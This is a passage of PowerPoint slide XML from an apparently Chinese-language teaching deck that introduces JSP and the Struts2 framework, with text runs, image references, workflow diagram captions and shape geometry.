                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>开发者来说，引入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>jsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-GB" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>可以把动态网页的表示逻辑从臃肿的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>Servlet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>代码中分离出来，即实现</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>应有的前后端分离，有利于程序的维护</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>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1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>写</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>JSP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>就像在写</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>HTML</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>，简洁明了</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="组合 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1024418" y="5599087"/>
              <a:ext cx="10248012" cy="1362490"/>
              <a:chOff x="1073475" y="5693357"/>
              <a:chExt cx="10198570" cy="1362490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="三角形 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2651319">
                <a:off x="1103889" y="6012233"/>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1073475" y="5693357"/>
                <a:ext cx="10198570" cy="1362490"/>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097275" y="5728120"/>
                <a:ext cx="1053296" cy="3009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Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>JSP</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>作用</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="679077" y="1300804"/>
            <a:ext cx="10925205" cy="2066576"/>
            <a:chOff x="795582" y="1703810"/>
            <a:chExt cx="10925205" cy="2066576"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="组合 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="795582" y="1703810"/>
              <a:ext cx="10925205" cy="2066576"/>
              <a:chOff x="920208" y="1823315"/>
              <a:chExt cx="10713011" cy="2066576"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="矩形: 对角圆角 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920208" y="1823316"/>
                <a:ext cx="10713011" cy="2066575"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 5462"/>
                  <a:gd name="adj2" fmla="val 2825"/>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04000" bIns="0" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="20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介绍：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>基于</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>java</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>平台的动态</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>页面技术，利用这种技术，可以实现</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>html</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>语言和</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>Java</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="666666"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:rPr>
                  <a:t>服务端语法元素的融合，能够是页面的表示逻辑与服务端运行的代码分离，便于程序的维护</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60045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>Java Server Pages </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>Java</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>服务器端页面，也和</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>Servlet</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>一样，用于动态</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="-apple-system"/>
                  </a:rPr>
                  <a:t>技术</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4D4D4D"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="-apple-system"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920212" y="1823315"/>
                <a:ext cx="1171378" cy="431493"/>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JSP</a:t>
                </a:r>
                <a:endPar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4" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="942075" y="1779826"/>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gr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17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7166610" y="3429000"/>
            <a:ext cx="2672526" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 本质就是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="797574" y="4700638"/>
            <a:ext cx="5000752" cy="2016351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5557400" y="4700638"/>
            <a:ext cx="4464866" cy="1897380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="845714" y="1872126"/>
            <a:ext cx="5410200" cy="2375210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7132320" y="2034540"/>
            <a:ext cx="2529026" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>页面转变成了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>程序</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>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zh-CN" altLang="en-US" sz="7200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185420" y="1236980"/>
            <a:ext cx="11460480" cy="5336540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Struts2 是 Apache 软件组织推出的一个基于 MVC 模式的轻量级 Web 框架，自问世以来，就受到了广大 Web 开发者的欢迎。目前，Struts2 在 Java Web 开发领域中已占据了十分重要的地位。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目前为止，Struts 框架拥有两个主要版本：Struts1.x 和 Struts2.x。Struts1 是最早的基于 MVC 模式的轻量级 Web 框架，它能够合理划分代码结构，并包含验证框架、国际化框架等多种实用工具框架。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随着技术的不断进步，Struts1 的局限性也越来越多地暴露出来。为了符合更加灵活、高效的开发需求，Struts2 框架应运而生，并在逐渐取代 Struts1 框架。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Struts2 是在 Struts1 和 WebWork 技术（WebWork 是由 OpenSymphony 组织开发的、致力于组件化和代码重用的 J2EE Web 框架，它也是一个 MVC 框架）的基础上进行合并后的全新框架。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628900" y="1463040"/>
            <a:ext cx="6067425" cy="5115560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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230505" y="1252855"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工作流程图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</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文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297815" y="1298575"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工作流程图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524760" y="1233805"/>
            <a:ext cx="7450455" cy="5554345"/>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流程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="557864" y="4211577"/>
            <a:ext cx="769616" cy="576984"/>
            <a:chOff x="3675063" y="1296988"/>
            <a:chExt cx="1749425" cy="1473200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4303713" y="1460500"/>
              <a:ext cx="503237" cy="501650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 317 w 317"/>
                <a:gd name="T1" fmla="*/ 158 h 316"/>
                <a:gd name="T2" fmla="*/ 312 w 317"/>
                <a:gd name="T3" fmla="*/ 191 h 316"/>
                <a:gd name="T4" fmla="*/ 304 w 317"/>
                <a:gd name="T5" fmla="*/ 220 h 316"/>
                <a:gd name="T6" fmla="*/ 290 w 317"/>
                <a:gd name="T7" fmla="*/ 247 h 316"/>
                <a:gd name="T8" fmla="*/ 271 w 317"/>
                <a:gd name="T9" fmla="*/ 270 h 316"/>
                <a:gd name="T10" fmla="*/ 246 w 317"/>
                <a:gd name="T11" fmla="*/ 289 h 316"/>
                <a:gd name="T12" fmla="*/ 219 w 317"/>
                <a:gd name="T13" fmla="*/ 304 h 316"/>
                <a:gd name="T14" fmla="*/ 190 w 317"/>
                <a:gd name="T15" fmla="*/ 314 h 316"/>
                <a:gd name="T16" fmla="*/ 158 w 317"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 142 w 317"/>
                <a:gd name="T19" fmla="*/ 316 h 316"/>
                <a:gd name="T20" fmla="*/ 110 w 317"/>
                <a:gd name="T21" fmla="*/ 310 h 316"/>
                <a:gd name="T22" fmla="*/ 83 w 317"/>
                <a:gd name="T23" fmla="*/ 297 h 316"/>
                <a:gd name="T24" fmla="*/ 56 w 317"/>
                <a:gd name="T25" fmla="*/ 281 h 316"/>
                <a:gd name="T26" fmla="*/ 35 w 317"/>
                <a:gd name="T27" fmla="*/ 260 h 316"/>
                <a:gd name="T28" fmla="*/ 19 w 317"/>
                <a:gd name="T29" fmla="*/ 235 h 316"/>
                <a:gd name="T30" fmla="*/ 6 w 317"/>
                <a:gd name="T31" fmla="*/ 206 h 316"/>
                <a:gd name="T32" fmla="*/ 0 w 317"/>
                <a:gd name="T33" fmla="*/ 175 h 316"/>
                <a:gd name="T34" fmla="*/ 0 w 317"/>
                <a:gd name="T35" fmla="*/ 158 h 316"/>
                <a:gd name="T36" fmla="*/ 2 w 317"/>
                <a:gd name="T37" fmla="*/ 127 h 316"/>
                <a:gd name="T38" fmla="*/ 12 w 317"/>
                <a:gd name="T39" fmla="*/ 97 h 316"/>
                <a:gd name="T40" fmla="*/ 27 w 317"/>
                <a:gd name="T41" fmla="*/ 70 h 316"/>
